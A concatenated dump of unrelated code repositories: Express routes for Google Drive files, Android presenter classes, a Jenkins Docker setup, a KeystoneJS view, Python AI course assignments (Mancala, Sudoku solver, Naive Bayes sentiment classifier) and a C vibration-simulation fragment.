console.log("D1:", t2.getTime() - t1.getTime());
res.status(200).send({ ok: "OK" })
});
router.post('/anyCrawler', async function (req, res) {
console.log("anyCrawler");
const rootFolderId = req.body.rootFolderId
const rootFolderName = req.body.rootFolderName
let setNow = true
const auth = await googleDrive.authorize();
if (req.body.setNow == "false") {
setNow = false
} else {
setNow = true
}
let t1, t2, t3;
t1 = new Date();
const now = +Date.now()
let fileList = await googleDrive.listFiles(auth, rootFolderId, [{ fullName: rootFolderName, name: rootFolderName, id: rootFolderId }], now)
.catch(err => {
console.log("error:", err)
res.status(403).send("list file failed")
})
if (setNow) {
await googleDrive.deleteFilesForSync(200, now, rootFolderId).catch(err => {
console.log("error:", err)
// res.status(403).send("failed")
})
}
t2 = new Date();
console.log("D1:", t2.getTime() - t1.getTime());
res.status(200).send({ ok: "OK" })
});
router.post('/uploadFile', async function (req, res) {
console.log("uploadFile");
const mimeType = req.headers["content-type"]
const name = req.body.filename
const path = req.body.path
console.log("req.headers:", mimeType + " " + name + " " + path);
const auth = await googleDrive.authorize();
let t1, t2;
t1 = new Date();
const now = +Date.now()
// let fileList = "uploadFile"
let base64String = req.body.file;
let base64Image = base64String.split(';base64,').pop();
fs.writeFile(`fileTemp`, base64Image, { encoding: 'base64' }, async function (err) {
let fileList = await googleDrive.createFileWithFile(auth, name, path, mimeType, now)
.catch(err => {
console.log("error:", err)
res.status(403).send("failed")
})
t2 = new Date();
console.log("D1:", t2.getTime() - t1.getTime());
res.status(200).send({ fileList })
})
});
router.post('/createFolder', async function (req, res) {
console.log("createFolder");
const name = req.body.name
const parent = req.body.parent
console.log("name:", name);
const auth = await googleDrive.authorize();
let t1, t2, t3;
t1 = new Date();
const now = +Date.now()
let fileList = await googleDrive.createFile(auth, name, parent, "folder", now)
.catch(err => {
console.log("error:", err)
res.status(403).send("failed")
})
t2 = new Date();
console.log("D1:", t2.getTime() - t1.getTime());
res.status(200).send({ ok: "ok" })
});
router.delete('/deleteFile', async function (req, res) {
console.log("deleteFile");
const fileId = req.query.fileId
console.log("fileId:", fileId);
const auth = await googleDrive.authorize();
let t1, t2, t3;
t1 = new Date();
let fileList = await googleDrive.deleteFile(auth, fileId)
.catch(err => {
console.log("error:", err)
res.status(403).send("failed")
})
t2 = new Date();
console.log("D1:", t2.getTime() - t1.getTime());
res.status(200).send({ fileList })
});
router.patch('/renameFile', async function (req, res) {
console.log("renameFile");
const fileId = req.query.fileId
const name = req.body.name
console.log("fileId:", fileId);
console.log("name:", name);
const auth = await googleDrive.authorize();
let t1, t2, t3;
t1 = new Date();
const now = +Date.now()
let fileList = await googleDrive.renameFile(auth, fileId, name, now)
.catch(err => {
console.log("error:", err)
res.status(403).send("failed")
})
t2 = new Date();
console.log("D1:", t2.getTime() - t1.getTime());
res.status(200).send({ fileList })
});
router.patch('/moveFile', async function (req, res) {
console.log("moveFile");
const fileId = req.query.fileId
const folderId = req.body.folderId
console.log("fileId:", fileId);
console.log("folderId:", folderId);
const auth = await googleDrive.authorize();
let t1, t2, t3;
t1 = new Date();
const now = +Date.now()
let fileList = await googleDrive.moveFile(auth, fileId, folderId, now)
.catch(err => {
console.log("error:", err)
res.status(403).send("failed")
})
t2 = new Date();
console.log("D1:", t2.getTime() - t1.getTime());
res.status(200).send({ fileList })
});
export default router
| 2d4f604c0a14eb887e3402488fd0f7f9fc35d4f7 | [
"TypeScript"
] | 45 | TypeScript | jkes900136/messagingSystem | 86b1d4398ad9c87d0dbe467f07557801c75ae901 | 02ceaea7515de4ef90243f5426f0be41fbfa6316 |
refs/heads/master | <file_sep>package com.fanyafeng.wechat.home.contacts;
import android.content.Context;
import com.fanyafeng.wechat.home.main.MainContract;
/**
* Author: fanyafeng
* Data: 17/2/20 上午11:56
* Email: <EMAIL>
*/
public class ContactsPresenter implements ContactsContract.Presenter {
private Context context;
private ContactsContract.View contactsView;
public ContactsPresenter(Context context, ContactsContract.View contactsView) {
this.context = context;
this.contactsView = contactsView;
contactsView.setPresenter(this);
}
@Override
public void start() {
}
}
<file_sep>package com.fanyafeng.wechat;
/**
* Author: fanyafeng
* Data: 17/2/20 上午11:19
* Email: <EMAIL>
*/
public interface BasePresenter {
void start();
}
<file_sep>package com.fanyafeng.wechat;
/**
* Author: fanyafeng
* Data: 17/2/20 上午11:18
* Email: <EMAIL>
*/
public interface BaseView<T> {
void setPresenter(T presenter);
}
<file_sep>package com.fanyafeng.wechat.home.find;
import android.content.Context;
/**
* Author: fanyafeng
* Data: 17/2/20 上午11:56
* Email: <EMAIL>
*/
public class FindPresenter implements FindContract.Presenter{
private Context context;
private FindContract.View findView;
public FindPresenter(Context context, FindContract.View findView) {
this.context = context;
this.findView = findView;
findView.setPresenter(this);
}
@Override
public void start() {
}
}
| 2113dc1434a389122e438a3c29172ed92f3ddd78 | [
"Java"
] | 4 | Java | 1181631922/WeChat | 0a67bb40b11384d7a65cb0c7747dbcbc17ee28db | 77f2296a4e40ec2b4a1dcfa01d0a0241a234b337 |
refs/heads/master | <repo_name>toschneck/containerized-jenkins<file_sep>/docker-compose.yml
version: "2"
services:
jenkinsmaster:
image: jenkins:2.7.4
ports:
- 80:8080
volumes:
# mount the jenkins_configuraton folder
- ./jenkins_conf:/var/jenkins_home
# mount the host system time to the container
- /etc/localtime:/etc/localtime:ro
links:
- jenkinsslave
environment:
# set correct timezone
- TZ=Europe/Berlin
### use e.g.`docker-compose scale jenkinsslave=4`
jenkinsslave:
build: jenkins_slave
environment:
# set correct timezone
- TZ=Europe/Berlin
# TODO: change this password there and http://localhost/user/node/configure
- JENKINS_JNLP_PW=<PASSWORD>
- JENKINS_SLAVE_ADD_ARG=-executors 1
volumes:
- maven-data:/home/jenkins/.m2
# mount the host system time to the container
- /etc/localtime:/etc/localtime:ro
volumes:
maven-data:
driver: local<file_sep>/update_envrionment.sh
#!/bin/bash
# script to update the hole environment
# !!! requires: running ssh-agent !!!
echo "--> add all modified files to git and commit"
git add --all
git commit -m "add configration change automatically from $(date +%Y-%m-%d:%H:%M:%S)"
echo "--> pull all changes from repo and docker images"
git pull
docker-compose pull
echo "--> rebuild all containers"
docker-compose build && \
echo "--> stop and remove all running containers" && \
docker-compose scale jenkinsmaster=0 jenkinsslave=0 && \
docker-compose down && \
echo "--> start the new containers" && \
docker-compose up -d && \
docker-compose scale jenkinsslave=4
echo "--> push the changes to the git repo"
git push --all
<file_sep>/README.md
# Notes for build up docker-based Jenkins environment

## Build / Start / Shutdown
### automatic environment deployment
./update_envrionment.sh
The automatic environment deploy script will do the following steps:
1) adds all modified files to git and commits it
2) pulls all changes from repo
3) rebuild all containers
4) stop and remove all running containers
5) start the new containers
6) push the changes to the git repo
### manual environment deployment
build and start the jenkinse master and slave container
docker-compose build
docker-compose up
e.g. scale our amount on slave to `4`:
docker-compose scale jenkinsslave=4
(use for updates) shutdown and remove all started jenkins containers
docker-compose down
# Server / Nodes
* Jenkins Build Server: [localhost](http://localhost)
* The admin user have the following credentials: `admin` / `admin`
## git clone
Use as template the following github repo:
git clone <EMAIL>:toschneck/containerized-jenkins.git
# Docker Images
You will find the ready to use image for the Jenkins slave on Docerhub:
* **[toschneck/jenkins-slave-jnlp](https://hub.docker.com/r/toschneck/jenkins-slave-jnlp/)**
# Clean up temporary data
__(optional)__ remove all _temporary data_ as logs and so on
./rm_temp_conf_files.sh
## FOR PRODUCTION
__ATTENTION: make sure to change the default node password keys under:__
* http://localhost/user/node/configure
* and in your `docker-compose.yml`
```
environment:
- JENKINS_JNLP_PW=<PASSWORD>
```
| cb001e8691bc02915c64ed083f14706c22dd3aed | [
"Markdown",
"YAML",
"Shell"
] | 3 | YAML | toschneck/containerized-jenkins | 0eb45b6e871455711a69bf04516fa3c48b3d291f | 4ac226f11a3b43719dda036c8c8f76ee53a28b10 |
refs/heads/master | <file_sep>var keystone = require('keystone');
var async = require('async');
exports = module.exports = function (req, res) {
var view = new keystone.View(req, res);
var locals = res.locals;
// Init locals
locals.section = 'library';
locals.filters = {
detachment: req.params.detachment,
};
locals.data = {
costumes: [],
detachments: [],
};
// Load all detachments
view.on('init', function (next) {
keystone.list('Detachment').model.find().sort('name').exec(function (err, results) {
if (err || !results.length) {
return next(err);
}
locals.data.detachments = results;
// Load the counts for each detachment
async.each(locals.data.detachments, function (detachment, next) {
keystone.list('Costume').model.count().where('detachments').in([detachment.id]).exec(function (err, count) {
detachment.costumeCount = count;
next(err);
});
}, function (err) {
next(err);
});
});
});
// Load the current detachment filter
view.on('init', function (next) {
if (req.params.detachment) {
keystone.list('Detachment').model.findOne({ key: locals.filters.detachment }).exec(function (err, result) {
locals.data.detachment = result;
next(err);
});
} else {
next();
}
});
// Load the costumes
view.on('init', function (next) {
var q = keystone.list('Costume').paginate({
page: req.query.page || 1,
perPage: 10,
maxPages: 10,
})
.populate(' detachments');
if (locals.data.detachment) {
q.where('detachments').in([locals.data.detachment]);
}
q.exec(function (err, results) {
locals.data.costumes = results;
next(err);
});
});
// Render the view
view.render('library');
};
| be0f3564ab09590ea30013260a44d9c0ca5a5ba3 | [
"JavaScript"
] | 1 | JavaScript | LazyAardvark/Costume-Reference-Library | d52551883bceadb1a6a521dfc5499f63d93f34c0 | 8cd27dc110e33d496a0c063aa4806b8858db404c |
refs/heads/master | <repo_name>hannah-rose/348_Projects<file_sep>/Assignment2/test.py
# -*- coding: utf-8 -*-
"""
Created on Sun Apr 19 21:08:18 2015
@author: Peter
"""
from MancalaBoard import *
p1 = pbh423(1,Player.CUSTOM)
p2 = Player(2, Player.HUMAN)
mb = MancalaBoard()
mb.hostGame(p1, p2)<file_sep>/Assignment3/hra069_kmg381_pbh423.py
# Sudoku Solver
# Author(s) names AND netid's:
# <NAME> hra069
# <NAME> kmg381
# <NAME> pbh423
# Date: 2nd May, 2015
import struct, string, math, time
from copy import *
class SudokuBoard:
"""This will be the sudoku board game object your player will manipulate."""
count=0
verbose=0
def __init__(self, size, board, domain):
"""the constructor for the SudokuBoard"""
self.BoardSize = size #the size of the board
self.CurrentGameBoard= board #the current state of the game board
self.Domain = domain #the set of possible values for each cell
self.count=0
self.LCV_count=0
self.startTime=0.0
def set_value(self, row, col, value):
"""This function will create a new sudoku board object with the input
value placed on the GameBoard row and col are both zero-indexed"""
#add the value to the appropriate position on the board
self.CurrentGameBoard[row][col]=value
#return a new board of the same size with the value added
return SudokuBoard(self.BoardSize, self.CurrentGameBoard, self.Domain)
def print_board(self):
"""Prints the current game board. Leaves unassigned spots blank."""
div = int(math.sqrt(self.BoardSize))
dash = ""
space = ""
line = "+"
sep = "|"
for i in range(div):
dash += "----"
space += " "
for i in range(div):
line += dash + "+"
sep += space + "|"
for i in range(-1, self.BoardSize):
if i != -1:
print "|",
for j in range(self.BoardSize):
if self.CurrentGameBoard[i][j] > 9:
print self.CurrentGameBoard[i][j],
elif self.CurrentGameBoard[i][j] > 0:
print "", self.CurrentGameBoard[i][j],
else:
print " ",
if (j+1 != self.BoardSize):
if ((j+1)//div != j/div):
print "|",
else:
print "",
else:
print "|"
if ((i+1)//div != i/div):
print line
else:
print sep
def parse_file(filename):
"""Parses a sudoku text file into a BoardSize, and a 2d array which holds
the value of each cell. Array elements holding a 0 are considered to be
empty."""
f = open(filename, 'r')
BoardSize = int( f.readline())
NumVals = int(f.readline())
#initialize a blank board
board= [ [ 0 for i in range(BoardSize) ] for j in range(BoardSize) ]
#populate the board with initial values
for i in range(NumVals):
line = f.readline()
chars = line.split()
row = int(chars[0])
col = int(chars[1])
val = int(chars[2])
board[row-1][col-1]=val
return board
def is_complete(sudoku_board):
"""Takes in a sudoku board and tests to see if it has been filled in
correctly."""
BoardArray = sudoku_board.CurrentGameBoard
size = len(BoardArray)
subsquare = int(math.sqrt(size))
#check each cell on the board for a 0, or if the value of the cell
#is present elsewhere within the same row, column, or square
for row in range(size):
for col in range(size):
if BoardArray[row][col]==0:
return False
for i in range(size):
if ((BoardArray[row][i] == BoardArray[row][col]) and i != col):
return False
if ((BoardArray[i][col] == BoardArray[row][col]) and i != row):
return False
#determine which square the cell is in
SquareRow = row // subsquare
SquareCol = col // subsquare
for i in range(subsquare):
for j in range(subsquare):
if((BoardArray[SquareRow*subsquare+i][SquareCol*subsquare+j]
== BoardArray[row][col])
and (SquareRow*subsquare + i != row)
and (SquareCol*subsquare + j != col)):
return False
return True
def init_board(file_name):
"""Creates a SudokuBoard object initialized with values from a text file"""
board = parse_file(file_name)
domain = create_domain(board,len(board))
return SudokuBoard(len(board), board, domain)
def create_domain(board,size):
"""Initializes domain of all possibilities for each cell
Called from init_board"""
#Initialize blank domain
domain = [ [ 0 for i in range(size) ] for j in range(size) ]
#Fill in with every possible option
for row in range(size):
for col in range(size):
domain[row][col] = list(range(1,size+1))
return domain
def init_domain(board,size):
"""Uses forward checking to remove conflicts from initial puzzle.
Must be called after init_board to work correctly"""
domain = board.Domain
BoardArray = board.CurrentGameBoard
#Update conflicts based on items already in the sudoku
for row in range(size):
for col in range(size):
if (BoardArray[row][col])!=0:
domain[row][col] = [ BoardArray[row][col] ]
forwardcheck(board,domain,row,col)
return domain
def solve(initial_board, forward_checking = False, MRV = False, MCV = False,
LCV = False):
"""Takes an initial SudokuBoard and solves it using back tracking, and zero
or more of the heuristics and constraint propagation methods (determined by
arguments). Returns the resulting board solution. """
#Begin by initializing the domain
init_domain(initial_board,initial_board.BoardSize)
initial_board.startTime = time.time()
#print "Be patient! We're working on solving your puzzle..."
#Call backtrack with the required constraints
if forward_checking:
back_forward(initial_board, initial_board.Domain,MRV,MCV,LCV)
else:
backtrack(initial_board)
return initial_board
def backtrack(board):
"""Recursive implementation to solve a Sudoku board. Uses brute force to
check all possible solutions. If it cannot find one, it backtracks and undos
one of its guesses and continues."""
arr=getNextOpen(board)
row=arr[0]
col=arr[1]
if (row==-1):
#no Open Spots were found. All spots are filled so we are done
return True
if (board.startTime+600<time.time()):
print "TIME OUT"
return True
BoardArray = board.CurrentGameBoard
size = len(BoardArray)
#we will check if any of these values work
for test in range (1, size+1):
board.count+=1
#check if this test is a valid move.
if(noConflictCheck(board,test,row,col)):
#Set new value
board.set_value(row,col,test)
#if we are done, pass the true back through the recursion
if (backtrack(board)):
return True
#else undo the move and keep trying
board.set_value(row,col,0)
#if nothing else is found go back and change the most recent value
return False
def back_forward(board, domain,MRV,MCV,LCV):
"""Recursive implementation to solve a Sudoku board. Implements
forward checking into backtracking algorithm"""
if (MRV==True):
arr=getMRV(board)
elif (MCV==True):
arr=getMCV(board)
else:
arr=getNextOpen(board)
row=arr[0]
col=arr[1]
if (time.time()>board.startTime+600):
print "TIME OUT"
return True
#print col,row
if (row==-1):
#no Open Spots were found. All spots are filled so we are done
return True
BoardArray = board.CurrentGameBoard
#If LCV, sort domain of variable
if (LCV==True):
domain_test = deepcopy(domain)
dom = getLCV(board,domain_test,row,col)
else:
dom=domain[row][col]
#Check each value in domain
for test in dom:
board.count+=1
#check if this test is a valid move.
if(noConflictCheck(board,test,row,col)):
#Set new value
domain_test = deepcopy(domain)
board.set_value(row,col,test)
#Assess its domain and check for empty domains
if forwardcheck(board, domain_test, row, col):
if back_forward(board, domain_test,MRV,MCV,LCV):
return True
#else undo the move and keep trying
board.set_value(row,col,0)
domain = board.Domain
#if nothing else is found go back and change the most recent value
return False
def forwardcheck(board, domain, row, col):
"""After each new value is assigned, delete all conflicting values from other squares' domains"""
#Remove new value from conflicting squares
BoardArray = board.CurrentGameBoard
val = BoardArray[row][col]
size = len(BoardArray)
subsquare = int(math.sqrt(size))
#Check rows and columns for conflicts
for i in range(size):
if ((domain[row][i].count(val)!=0) and i != col):
(domain[row][i]).remove(val)
board.LCV_count += 1
if ((domain[i][col].count(val)!=0) and i != row):
(domain[i][col]).remove(val)
board.LCV_count += 1
#determine which square the cell is in and remove conflicts
SquareRow = row // subsquare
SquareCol = col // subsquare
for i in range(subsquare):
for j in range(subsquare):
if((domain[SquareRow*subsquare+i][SquareCol*subsquare+j]).count(val)!=0
and (SquareRow*subsquare + i != row)
and (SquareCol*subsquare + j != col)):
(domain[SquareRow*subsquare+i][SquareCol*subsquare+j]).remove(val)
board.LCV_count += 1
#Check for empty domains
if domain.count([])!=0:
return False
return True
def getLCV(board, domain, row, col):
"""Finds the least contrained value, leaving the largest number of options
in the domain of other empty sqares. Returns the domain of a variable, sorted
so that the LCV will be tried first"""
#Get list of possible values
board_test = deepcopy(board)
domain_test = deepcopy(domain)
dom = domain_test[row][col]
#turn the domain into an empty dictionary
dom_dict = {x: 0 for x in dom}
#Attach number of changes to each possible value
for val in dom_dict:
#set test value and forward check it
board_test.CurrentGameBoard[row][col] = val
board_test.LCV_count = 0
forwardcheck(board_test,domain_test,row,col)
#Add LCV_count to dictionary
dom_dict[val]=board_test.LCV_count
#reset domain to try again for next test
domain_test = domain
#sort dictionary by LCV_counts and return the sorted domain
dom_sort = sorted(dom_dict, key=dom_dict.__getitem__)
return dom_sort
def getNextOpen(board):
"""Returns the next empty spot, which is shown as a 0 in our array
If it can't find one, it returns [-1,-1], which means the puzzle is complet
Otherwise it returns an array formatted [row, col]"""
for i in range (0,board.BoardSize):
for j in range (0,board.BoardSize):
if board.CurrentGameBoard[i][j]==0:
#return the row and col
return [i,j]
#else return false, so we are done
return [-1,-1]
def getMRV(board):
"""Minimum Remaining Values: Chooses the variable with the
fewest values left"""
minDomain=999
minRow=-1
minCol=-1
for i in range (0,board.BoardSize):
for j in range (0,board.BoardSize):
if board.CurrentGameBoard[i][j]==0:
testDomain=len(board.Domain[i][j])
if testDomain<minDomain:
minDomain=testDomain
minRow=i
minCol=j
return [minRow,minCol]
def getMCV(board):
"""Most Constrained Variable: Chooses the variable that is involved in the
largest number of constraints with other unassigned variables"""
maxConstraints = -1
minRow=-1
minCol=-1
mcv_count = 0
size = len(board.CurrentGameBoard)
subsquare = int(math.sqrt(size))
#board.print_board()
##test = [ [ 0 for i in range(size) ] for j in range(size) ]
for row in range(0,board.BoardSize):
for col in range(0,board.BoardSize):
mcv_count = 0
if (board.CurrentGameBoard[row][col] == 0):
#Check rows and columns for conflicts
for i in range(board.BoardSize):
if ((board.CurrentGameBoard[row][i]==0) and i != col and i//subsquare!=subsquare):
mcv_count += 1
if ((board.CurrentGameBoard[i][col]==0) and i != row and i//size!=subsquare):
mcv_count += 1
#determine which square the cell is in and find conflicts
SquareRow = row // subsquare
SquareCol = col // subsquare
for i in range(subsquare):
for j in range(subsquare):
if((board.CurrentGameBoard[SquareRow*subsquare+i][SquareCol*subsquare+j])==0
and (SquareRow*subsquare + i != row)
and (SquareCol*subsquare + j != col)):
mcv_count += 1
if maxConstraints < mcv_count:
maxConstraints = mcv_count
minRow = row
minCol = col
#test[row][col]=mcv_count
#print test
return [minRow,minCol]
def noConflictCheck(board,num,row,col):
"""Shortened version of is_complete. Only checks the row, col and subsquare
that we are checking. """
BoardArray = board.CurrentGameBoard
size = len(BoardArray)
subsquare = int(math.sqrt(size))
for i in range(size):
if ((BoardArray[row][i] == num) and i != col):
return False
if ((BoardArray[i][col] == num) and i != row):
return False
#determine which square the cell is in
SquareRow = row // subsquare
SquareCol = col // subsquare
for i in range(subsquare):
for j in range(subsquare):
if((BoardArray[SquareRow*subsquare+i][SquareCol*subsquare+j] == num)
and (SquareRow*subsquare + i != row)
and (SquareCol*subsquare + j != col)):
return False
return True<file_sep>/Assignment4/test.py
# -*- coding: utf-8 -*-
"""
Created on Tue May 12 16:04:49 2015
@author: peter
"""
from hra069_kmg381_pbh423 import *
b=Bayes_Classifier(0)
b.validate()
<file_sep>/Assignment3/test.py
# -*- coding: utf-8 -*-
"""
Created on Mon Apr 27 12:13:10 2015
@author: peter
"""
from hra069_kmg381_pbh423 import *
verbose=0
b=init_board("input_puzzles/easy/9_9.sudoku")
#b=init_board("input_puzzles/more/more/16x16/16x16.3.sudoku")
b.print_board()
#test=getNextOpen(b)
#backtrack(b)
solved_board = solve(b,True,False,True,False)
#b.print_board()
solved_board.print_board()
print is_complete(solved_board)
print solved_board.count<file_sep>/Assignment5/a5code/test.py
# -*- coding: utf-8 -*-
"""
Created on Thu Jun 04 22:26:09 2015
@author: Peter
"""
execfile("StrokeHmm.py")
sl = StrokeLabeler()
#text,draw=sl.featureBatch("../trainingFiles/")
#print "Text Avg: "+str(sum(text)/len(text))
#print "Draw Avg: "+str(sum(draw)/len(draw))
#"""
sl.trainHMMDir("../trainingFiles/")
labels,myLabels=sl.testBatch("../trainingFiles/")
print len(labels)
print len(myLabels)
returns=sl.confusion(labels,myLabels)
print returns
#"""<file_sep>/Assignment3/run_all.py
# -*- coding: utf-8 -*-
"""
Created on Saturday, May 2, 2015
@author: Hannah
"""
from hra069_kmg381_pbh423 import *
s="input_puzzles/easy/16_16.sudoku"
print"Backcheck Only"
b4=init_board(s)
solved_board = solve(b4,False,False,False,False)
print is_complete(solved_board)
print solved_board.count,"\n"
print "Forwardcheck Only"
b4=init_board(s)
solved_board = solve(b4,True,False,False,False)
print is_complete(solved_board)
print solved_board.count,"\n"
print
print "FC with LCV"
print
b4=init_board(s)
solved_board = solve(b4,True,False,False,True)
print is_complete(solved_board)
print solved_board.count,"\n"
print "FC with MRV"
b4=init_board(s)
solved_board = solve(b4,True,True,False,False)
print is_complete(solved_board)
print solved_board.count,"\n"
print "FC with MRV + LCV"
b4=init_board(s)
solved_board = solve(b4,True,True,False,True)
print is_complete(solved_board)
print solved_board.count,"\n"
print "FC with MCV"
b4=init_board(s)
solved_board = solve(b4,True,False,True,False)
print is_complete(solved_board)
print solved_board.count,"\n"
print "FC with MCV + LCV"
b4=init_board(s)
solved_board = solve(b4,True,False,True,True)
print is_complete(solved_board)
print solved_board.count,"\n"
#print is_complete(solved_board)
#print solved_board.count<file_sep>/Assignment4/bayes_template.py
# Bayes_Classifier
# Author(s) names AND netid's:
# <NAME> hra069
# <NAME> kmg381
# <NAME> pbh423
# Date: 2nd May, 2015
import math, os, pickle, re
class Bayes_Classifier:
goodDict=dict()
badDict=dict()
def __init__(self, train=0):
"""This method initializes and trains the Naive Bayes Sentiment Classifier. If a
cache of a trained classifier has been stored, it loads this cache. Otherwise,
the system will proceed through training. After running this method, the classifier
is ready to classify input text."""
if (not os.path.isfile("goodDict.pickle") or not os.path.isfile("badDict.pickle") or train==1):
self.train()
else:
self.goodDict=self.load("goodDict.pickle")
self.badDict=self.load("badDict.pickle")
def train(self):
"""Trains the Naive Bayes Sentiment Classifier."""
for files in os.walk("./movies_reviews"):
for fileNames in files[2]:
if fileNames[7]=='1':
currDict=self.badDict
otherDict=self.goodDict
else:
currDict=self.goodDict
otherDict=self.badDict
tokens=self.tokenize(self.loadFile("./movies_reviews/"+fileNames))
for token in tokens:
if token in currDict:
currDict[token]+=1
else:
currDict[token]=1
if token not in otherDict:
otherDict[token]=0
for key in self.goodDict:
self.goodDict[key]+=1
for key in self.badDict:
self.badDict[key]+=1
self.save(self.goodDict, "goodDict.pickle")
self.save(self.badDict, "badDict.pickle")
def classify(self, sText, verbose=0):
"""Given a target string sText, this function returns the most likely document
class to which the target string belongs (i.e., positive, negative or neutral).
"""
#defines if we use logs or normals
log=1
numGood=sum(self.goodDict.itervalues())
numBad=sum(self.badDict.itervalues())
tokens=self.tokenize(sText)
if log:
goodProb=0
badProb=0
else:
goodProb=1.0
badProb=1.0
for token in tokens:
if log:
if token in self.goodDict:
goodProb+= math.log(self.goodDict[token]/float(numGood))
if token in self.badDict:
badProb+= math.log(self.badDict[token]/float(numBad))
else:
if token in self.goodDict:
goodProb*= (self.goodDict[token]/float(numGood))
if token in self.badDict:
badProb*= (self.badDict[token]/float(numBad))
if verbose:
print goodProb
print badProb
# different types of classification. For evaluation we are not including negatives
if goodProb>badProb:
return "positive"
elif badProb>=goodProb:
return "negative"
# if log:
# diff=goodProb-badProb
# avg= (goodProb+badProb)/2
# if verbose:
# print "diff:",diff
# print "avg:",avg
# if diff>abs(avg/10) or diff > 2:
# return "positive"
# elif diff<(avg/10) or diff < -2:
# return 'negative'
# else:
# return 'neutral'
# else:
# if 10*goodProb>badProb:
# return "positive"
# elif 10*badProb>goodProb:
# return "negative"
# else:
# return "neutral"
def loadFile(self, sFilename):
"""Given a file name, return the contents of the file as a string."""
f = open(sFilename, "r")
sTxt = f.read()
f.close()
return sTxt
def save(self, dObj, sFilename):
"""Given an object and a file name, write the object to the file using pickle."""
f = open(sFilename, "w")
p = pickle.Pickler(f)
p.dump(dObj)
f.close()
def load(self, sFilename):
"""Given a file name, load and return the object stored in the file."""
f = open(sFilename, "r")
u = pickle.Unpickler(f)
dObj = u.load()
f.close()
return dObj
def tokenize(self, sText, bi=0):
"""Given a string of text sText, returns a list of the individual tokens that
occur in that string (in order).
Has been edited so it can include bigrams, which are inabled by the input."""
#include two word strings
if (bi):
lTokens = []
last = ""
sToken = ""
for c in sText:
if re.match("[a-zA-Z0-9]", str(c)) != None or c == "\"" or c == "_" or c == "-":
sToken += c
else:
if sToken != "":
if last!= "":
lTokens.append(last+" "+sToken)
last=sToken
lTokens.append(sToken)
sToken = ""
if c.strip() != "":
lTokens.append(str(c.strip()))
if sToken != "":
lTokens.append(sToken)
else:
lTokens = []
sToken = ""
for c in sText:
if re.match("[a-zA-Z0-9]", str(c)) != None or c == "\"" or c == "_" or c == "-":
sToken += c
else:
if sToken != "":
lTokens.append(sToken)
sToken = ""
if c.strip() != "":
lTokens.append(str(c.strip()))
if sToken != "":
lTokens.append(sToken)
return lTokens
def validate(self, folds=10):
"""uses N fold clasification to validate the results.
Splits the data into N groups. The trains on all but one group
Then tests on the excludeed group"""
for stuff in os.walk("./movies_reviews"):
files=stuff[2]
numFiles=len(files)
foldSize=numFiles/folds
groups=[]
for i in range(folds):
groups.append(files[i*foldSize:(i+1)*foldSize])
trainGroups=[None]*10
for i in range(folds):
trainGroups[i]=[]
for exclusion in range(folds):
if exclusion!=i:
trainGroups[i]+=groups[exclusion]
precision=[None]*folds
recall=[None]*folds
accuracy=[None]*folds
fmeasure=[None]*folds
for i in range(folds):
self.goodDict.clear()
self.badDict.clear()
self.trainFileName(trainGroups[i])
results = self.classifyBatch(groups[i])
for x in results:
print x
trueNeg = float(results[0])
wrongNeg = float(results[1])
truePos = float(results[2])
falsePos = float(results[3])
positive = float(results[4])
total = float(results[6])
precision[i] = truePos/(truePos+falsePos)
print "precision:",precision[i]
recall[i] = float(truePos/(truePos+wrongNeg))
print "recall:",recall[i]
accuracy[i] = float((truePos+trueNeg)/(total))
print "accuracy",accuracy[i]
fmeasure[i] = float(2*truePos/(2*truePos+falsePos+wrongNeg))
print "fmeasure",fmeasure[i]
print "Final accuracies"
print "Precision:",avg(precision)
print "Recall:", avg(recall)
print "Accuracy:",avg(accuracy)
print "Fmeasure",avg(fmeasure)
def trainFileName(self, files):
"""Alternative training method that takes a list of filenames and then trains on them. Made so we can exclude a test set easily"""
for fileNames in files:
if fileNames[7]=='1':
currDict=self.badDict
otherDict=self.goodDict
else:
currDict=self.goodDict
otherDict=self.badDict
tokens=self.tokenize(self.loadFile("./movies_reviews/"+fileNames))
for token in tokens:
if token in currDict:
currDict[token]+=1
else:
currDict[token]=1
if token not in otherDict:
otherDict[token]=0
for key in self.goodDict:
self.goodDict[key]+=1
for key in self.badDict:
self.badDict[key]+=1
def classifyBatch(self, files):
"""Calls classify on on files in the list files. Tallys up the results"""
positive = 0
negative = 0
wrongPos=0
correctPos=0
wrongNeg=0
correctNeg=0
total = 0
for fileName in files:
result=self.classify(self.loadFile("./movies_reviews/"+fileName))
total+=1
if fileName[7]=='1':
negative+=1
if result=="positive":
wrongNeg+=1
elif result=="negative":
correctNeg+=1
else:
positive+=1
if result=="positive":
correctPos+=1
elif result=="negative":
wrongPos+=1
return [correctNeg, wrongNeg, correctPos, wrongPos,positive,negative,total]
def avg(l):
"""Average of a list"""
return sum(l)/float(len(l))
| ff30c12538ccdbecbda7e66f69d37969315b5a1d | [
"Python"
] | 7 | Python | hannah-rose/348_Projects | d61c809724101c26db3d7c01004dd26d59a422a3 | 127c8a0c891d299f18860a48fbfffcc98266e419 |
refs/heads/master | <file_sep>#ifdef SINGLE
#define REAL float
#else /* not SINGLE */
#define REAL double
#endif /* not SINGLE */
#include <stdio.h>
#include <stdlib.h>
#include <math.h>
#include <assert.h>
#include "mesh.h"
//#define freq 44100
#define freq 44100 //352800
#define duration 1
struct Mesh *mesh;
REAL *uc, *up, *us;
REAL *d4uc, *d4up;
// Temporaries used to avoid multiple dynamic allocations
REAL *d_tmp, *d4x, *d4y, *d2xy;
int main()
{
// Read binary mesh
mesh = (struct Mesh*)malloc(sizeof(struct Mesh));
loadBinaryMesh(mesh, "binaryMesh.bin");
REAL dt = 1.0f/freq;
REAL son[freq*duration];
REAL delta = 0.0029; // m epaisseur table
REAL rho = 350.0; // kg.m-3
// REAL eta = 0.005; // s
REAL eta = 0.0; // s
REAL R = 7.0; // s-1
REAL d2 = delta*delta / (12.0*rho);
REAL A = dt*dt / (delta * rho);
REAL B = -(eta+dt) * dt * d2; //TODO : sign might be wrong
REAL C = eta * dt * d2; //TODO : sign might be wrong
// REAL B = (eta+dt) * dt * d2; //TODO : sign might be wrong
// REAL C = - eta * dt * d2; //TODO : sign might be wrong
REAL D = R * dt;
REAL nu_xy = 0.3;
REAL nu_yx = 0.3; //symmetric ???
REAL E_x = 9925.0 * 1.0e6; //Pa
REAL E_y = 852.0 * 1.0e6; //Pa
REAL G_xy = 600.0 * 1.0e6; //Pa = kg /(m.s^2) = N / m^2
REAL a = E_x / (1.0-nu_xy*nu_yx) ;
REAL b = 4.0 * G_xy - (E_y*nu_xy + E_x*nu_yx)/ (1.0-nu_xy*nu_yx);
REAL c = E_y / (1.0-nu_xy*nu_yx);
}
<file_sep>
#include "mesh.h"
#include <stdio.h>
#include <stdlib.h>
